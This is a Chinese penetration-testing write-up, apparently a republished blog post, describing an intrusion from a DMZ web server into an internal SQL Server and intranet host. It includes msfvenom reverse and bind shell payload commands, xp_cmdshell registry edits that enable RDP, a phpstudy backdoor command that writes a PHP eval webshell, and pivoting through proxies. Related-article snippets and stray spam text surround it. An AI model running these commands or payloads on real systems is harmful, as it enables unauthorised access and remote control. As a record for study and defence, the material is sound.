<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次站庫分離的內網滲透

    VSole2022-12-23 09:22:20

    DMZ Web

    Information Gathering

    WEB服務器,但是首頁只有一個IIS 7的歡迎界面,所以先看一下端口順便掃個目錄。

    目錄沒什么東西,不過可以看到aspx的環境,看一下端口:

    開了21,還有一個999的web端口。

    嘗試對phpmyadmin mysql的root、admin、test賬號做了enumeration,沒什么效果,后面進行端口掃描的時候發現漏了一個端口

    這個前臺面板看了下可以登陸ftp、mssql、mysql,簡單的先嘗試了幾個弱口令無果。

    并且窮舉了子域名

    www.target.com 科訊

    new.target.com 織夢

    ww2.target.com Grcms

    Dedecms Getshell

    dedecms默認后臺,版本DedeCMSV57_UTF8_SP1(20150618 kali中文亂碼,湊合看…),這個版本注入應該,先注冊用戶然后可以跑出來admin的密碼

    getshell比較簡單,文件管理器->新建文件即可。

    DMZ Privilege Escalatioon

    拿到了webshell考慮彈一個msf meterpreter shell回來。


    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.187 lport=2678 -f exe > ./bd.exe
    

    懷疑是不是有disable_functions,看一下

    AntSword有個插件非常方便可以繞…我不太想手工了,麻煩,上個aspx馬看一下

    先用D神工具測一下目錄

    最后寫到了c:\windows\debug\WIA中并執行。

    直接getsystem是不行的,用suggester來試一下

    這里選擇用ms16_075來提權

    SQL Server

    Privilege Escalation

    看到還有一個網卡,是有內網的,加個用戶開3389上去看一下

    看到確實有三個網站在運行,有一個是.net的,但是本機沒有sql server,考慮是不是站庫分離的情況。

    因此確定ww2.target.com是站庫分離的情況,并且直接是sa權限。直接aspx馬連一家伙

    添加一下xp_cmdshell執行命令

    136應該是sql sever ip,先xp_cmdshell強開一波3389


    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /fnet start termservice
    

    Socks Proxifier

    這里選擇用ew來做代理。

    看到確實開了,但是proxchains連接不上,估計是防火墻或者其他原因。這里其實還可以選擇用msf進行后滲透,我是關掉了DMZ的防火墻。

    這里注意,如果ew比較麻煩,不太好上傳,那我們可以在msf添加了路由之后,使用auxiliary/server/socks4a這個模塊,用msf開個socks代理,這樣本機可以通過msf的路由來訪問內網,proxychains配置就寫本機ip即可。

    但還是要用msf添加一下路由

    接著我用msfvenom生成bind_tcp的后門,本機Windows通過proxifier(或SocksCap64)連到DMZ的8888端口進而連接SQL Server的3389并開啟文件共享,然后執行后門


    msfvenom -p windows/meterpreter/bind_tcp lport=2999 -f exe > ./bd_1.exe
    

    而此時因為msf已經添加路由,可以通過路由去主動連SQL Server服務器獲取shell

    成功獲取shell。

    再添加一層路由,看一下10.10.1.0/24這個段有什么。

    Intranet Web

    Information Gathering

    看到一臺129,我也不做探測了,看起來就那么一兩臺,如果要探測內網的話可以proxychains配合nmap或者msf添加路由后本身就可以完成。同樣的,用ew做了層代理。

    我選擇了msf直接探測端口…比較方便,但是后面涉及到了web,所以考慮了一下還是做了ew。

    Eternanal Blue

    FAIL…

    PHPstudy Getshell

    好家伙,直接試試phpstudy后門。


    python .\phpstudy.py "echo ^<?php @eval($_POST[shell]); ?^>>c:\phpstudy\WWW\get.php"
    


    注意Windows轉義,并且實測powershell這條不成功,cmd可以。

    也不用提權了。

    路由msf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    內網滲透合集(一)
    2023-01-28 09:31:07
    dmesg | grep Linuxls /boot | grep vmlinuz正在運行的服務ps auxps -eftopcat /etc/service哪些服務具有root權限ps aux | grep rootps -ef | grep root安裝了哪些程序,版本,以及正在運行的ls -alh /usr/bin/ls -alh /sbin/dpkg -lrpm -qals -alh /var/cache/apt/archivesOls -alh /var/cache/yum/服務的配置文件cat /etc/syslog.conf?cat /etc/apache2/apache2.confcat /etc/my.confcat /etc/httpd/conf/httpd.confcat /opt/lampp/etc/httpd.confls -aRl /etc/ | awk '$1 ~ /^.*r.*/工作計劃crontab -lls -alh /var/spool/cronls -al /etc/ | grep cronls -al /etc/cron*cat /etc/cron*cat /etc/at.allowcat /etc/at.denycat /etc/cron.allowcat /etc/cron.denycat /etc/crontabcat /etc/anacrontabcat /var/spool/cron/crontabs/root網絡配置cat /etc/resolv.confcat /etc/sysconfig/networkcat /etc/networksiptables -Lhostnamednsdomainname其他用戶主機與系統的通信?
    一、環境配置靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2攻擊示意圖:靶機統一使用虛擬機搭建web服務器:windows7 ip:192.168.52.143/192.168.154.152域成員:windows server 2003 ip:192.168.52.141域控:windows server 2008 ip:192.16
    web、PC、DC都處于同一域環境內,需要手動開啟weblogic服務
    很早就想專門寫一篇關于內網的文章,一直沒有騰出空來,萬萬沒想到,寫下這篇文章的時候,竟然是我來某實驗室實習的時間段:)
    內網滲透-代理篇
    2021-12-01 05:44:01
    利用代理工具將內網的流量代理到本地進行訪問,這樣就可以對內網進行下一步滲透,同時也可以利用代理工具將其他網段的流量轉發到本地進行縱向滲透。代理的本質是Socks協議(防火墻安全會話轉換協議),工作在OSI參考模型的第5層(會話層)。使用TCP協議傳輸數據,因而不提供如傳遞ICMP信息之類的網絡層相關服務。目前支持SOCKS4和SOCKS5兩個版本:
    DMZ WebInformation GatheringWEB服務器,但是首頁只有一個IIS 7的歡迎界面,所以先看一下端口順便掃個目錄。嘗試對phpmyadmin mysql的root、admin、test賬號做了enumeration,沒什么效果,后面進行端口掃描的時候發現漏了一個端口這個前臺面板看了下可以登陸ftp、mssql、mysql,簡單的先嘗試了幾個弱口令無果。),這個版本注入應該,先注冊用戶然后可以跑出來admin的密碼getshell比較簡單,文件管理器->新建文件即可。DMZ Privilege Escalatioon拿到了webshell考慮彈一個msf meterpreter shell回來。
    首先對ubuntu進行端口掃描,發現開了21、22、80、888、3306、8888端口
    域滲透實戰之 vsmoon
    2023-11-14 10:40:10
    域滲透實戰之 vsmoon
    從fofa中搜索RDP,會看到它會解析出RDP的信息。本文探索如何自己實現一個。1. Nmap指紋在http
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类